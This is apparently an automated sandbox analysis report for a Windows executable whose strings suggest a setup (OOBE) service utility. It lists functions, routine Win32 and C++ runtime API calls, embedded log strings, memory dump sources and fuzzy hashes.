                                                                                                                                                                                                                                                                    • ServiceWorkerThread: Workflow Start Failed, xrefs: 004016D6
                                                                                                                                                                                                                                                                    • string too long, xrefs: 004013E0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                    • String ID: ServiceWorkerThread: Started$ ServiceWorkerThread: Workflow Start Failed$ ServiceWorkerThread: Workflow Started$ServiceWorkerThread: Returning from the worker thread$string too long
                                                                                                                                                                                                                                                                    • API String ID: 3990507346-493984609
                                                                                                                                                                                                                                                                    • Opcode ID: d82a602f60015f722318a5e5598d58ea829feccefa44ef9ae6b957b033f1123a
                                                                                                                                                                                                                                                                    • Instruction ID: 0de4d92833269bd46795cda1e8f9f860099c4cf613756acb1c3ca96f5a9e6a69
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d82a602f60015f722318a5e5598d58ea829feccefa44ef9ae6b957b033f1123a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0A13BB1A002059BE710DF69DC42B6EB7A4EF40314F24427FE815E73D1EB78994487DA
                                                                                                                                                                                                                                                                    Function 00401DB0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 145COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in SetEvnt $OOBEEvents$OOBEUtils$Receiveded SERVICE_CONTROL_STOP signal$ServiceCtrlHandler: Finished$ServiceCtrlHandler: Started
                                                                                                                                                                                                                                                                    • API String ID: 0-3825141419
                                                                                                                                                                                                                                                                    • Opcode ID: 6ca62fb21f9d5d796d1c64262897b507ae4cdca6753128363298717e489f106b
                                                                                                                                                                                                                                                                    • Instruction ID: 66e086e936243a972247da67edb77e0195688db155f0063ebd03624c2dfed7a4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ca62fb21f9d5d796d1c64262897b507ae4cdca6753128363298717e489f106b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D51C270A81215ABEB10DB15DD46B5E3BA4EB00B18F14017BF905B73D1EF78A9048BEE
                                                                                                                                                                                                                                                                    Function 004165A0 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 154COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,?,00000000,00000000,?,00404FB7,00000000,00000000,004B0CCA,00000000), ref: 004165BA
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 00416661
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00416678
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                    • String ID: Error allocating memory while converting UTF8 string to Native string$Failed to convert MultiByteToWideChar. ErrorCode::%d$OOBEUtils$StringUtils
                                                                                                                                                                                                                                                                    • API String ID: 1717984340-475419079
                                                                                                                                                                                                                                                                    • Opcode ID: 2ac2b592db3f9692cb7a5b3bc46003a3bf626419324c79dd5455d25ea0bdc311
                                                                                                                                                                                                                                                                    • Instruction ID: 607fb1377a63fdc9f035f0c432f6c8044d68b344f7ff51ac538f5213003713f8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ac2b592db3f9692cb7a5b3bc46003a3bf626419324c79dd5455d25ea0bdc311
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0418D35781214A7C620AF6AAC47FEB7358EB81B25F1401BBFD09A32D0DD69AD0046ED
                                                                                                                                                                                                                                                                    Function 00412610 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 169COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004126EE
                                                                                                                                                                                                                                                                    • __Getctype.LIBCPMT ref: 00412707
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00412751
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004127EF
                                                                                                                                                                                                                                                                    • __Getwctype.LIBCPMT ref: 0041282A
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$Locinfo::_$GetctypeGetwctypeLocinfo_ctorLocinfo_dtorLockitLockit::~_
                                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                                    • API String ID: 201867346-1405518554
                                                                                                                                                                                                                                                                    • Opcode ID: 1af70972fbd8fd394261b7672b218bb29ee07418f61f38ba363869a3bb34d789
                                                                                                                                                                                                                                                                    • Instruction ID: fb01a51910be7c6eaa99b540ff2eac30bca8d6a60054ec657d3f721683236568
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1af70972fbd8fd394261b7672b218bb29ee07418f61f38ba363869a3bb34d789
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 525193B1C003589BEB10DFA5C945BDAB7B4BF14314F14826ED848E7341EB78EA94CB66
                                                                                                                                                                                                                                                                    Function 0270D940 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 0270D977
                                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0270D97F
                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 0270DA08
                                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0270DA33
                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 0270DA88
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000003.2765700918.00000000026E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 026E0000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_3_26e0000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                    • Opcode ID: 894e7069a3bb6f9b8afff5041ee8ce0e025d7d72bd3e0c4b75bd4b3fd437d9f4
                                                                                                                                                                                                                                                                    • Instruction ID: 42e6c2e14da8e91730bd294b7d9e638192c40280eb952d19dde3eb4f8a56431d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 894e7069a3bb6f9b8afff5041ee8ce0e025d7d72bd3e0c4b75bd4b3fd437d9f4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D41AE74A00318DBCF21DFA9C884A9EBBE1EF05318F148195E819AB391D771A919CF91
                                                                                                                                                                                                                                                                    Function 0041FA30 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77synchronizationCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000008,000000FF,00000000,00000008,00405984,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB10
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,00000028), ref: 0041FB19
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandleObjectSingleWait
                                                                                                                                                                                                                                                                    • String ID: All pipes closed properly.$CommBridge$Inside closeBridge$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 528846559-1211123791
                                                                                                                                                                                                                                                                    • Opcode ID: 1f3c2fab79f574a5bc492b236c571b4ebadb7da9787cdc0bcc3f81ec269f5a84
                                                                                                                                                                                                                                                                    • Instruction ID: c28e8b6ec9cc632472ca235f45b3f8d0a108cff224a1436875239388707932b2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f3c2fab79f574a5bc492b236c571b4ebadb7da9787cdc0bcc3f81ec269f5a84
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3421D330B40321A7CA20EF268C56F873B54AF12F11F240577B806A72D0CEACF99187AD
                                                                                                                                                                                                                                                                    Function 0048857A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00488689,0040B377,?,00000000,?,?,?,004888B3,00000022,FlsSetValue,004A3F04,004A3F0C,?), ref: 0048863B
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                    • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                    • Opcode ID: 11c0850fd9dd82efe467599ba98e49e0b0b665d46b4f2ea3fd8847a1b3d20761
                                                                                                                                                                                                                                                                    • Instruction ID: 0d18bb84f8fc76a6c3da93e18ff47703567a800fd64ff94e1cc0b507c8cbf4c8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11c0850fd9dd82efe467599ba98e49e0b0b665d46b4f2ea3fd8847a1b3d20761
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C21C331A01221ABCB21AB259C41A9F37589B51760F64096BE906B7390EF38ED00CBDD
                                                                                                                                                                                                                                                                    Function 00427260 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 70COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,?,0040653E), ref: 0042726E
                                                                                                                                                                                                                                                                    • PathIsDirectoryW.SHLWAPI(?,?,0040653E), ref: 00427283
                                                                                                                                                                                                                                                                    • SHCreateDirectoryExW.SHELL32(00000000,?,00000000,?,?,0040653E), ref: 0042729D
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: DirectoryPath$CreateExistsFile
                                                                                                                                                                                                                                                                    • String ID: FileUtils$OOBEUtils$SHCreateDirectoryEx failed. Error: %d
                                                                                                                                                                                                                                                                    • API String ID: 3984196470-716391998
                                                                                                                                                                                                                                                                    • Opcode ID: e2f3c0152dea6573d78a5f9b5d09177c3ec5f57044b8f182ed452466184478f4
                                                                                                                                                                                                                                                                    • Instruction ID: 1c360898109e8edf91c6b2f0d6b286c19c2d4d721b312238894a1274079c5597
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2f3c0152dea6573d78a5f9b5d09177c3ec5f57044b8f182ed452466184478f4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0119B3174522097CA249B55BD4AF4B3758AFC2F51B5504ABFC4557391CA68AC40CABC
                                                                                                                                                                                                                                                                    Function 004151D0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 004151DB
                                                                                                                                                                                                                                                                    • DestroyEnvironmentBlock.USERENV(00000000,?,00414C7F,?), ref: 004151E9
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 004151F7
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 00415205
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 00415212
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00414C7F,?), ref: 00415226
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 0041523F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000021.00000002.2769041483.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2768988823.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769157080.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769238031.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000021.00000002.2769317004.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_400000_148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandle$BlockDestroyEnvironment
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1096182194-0
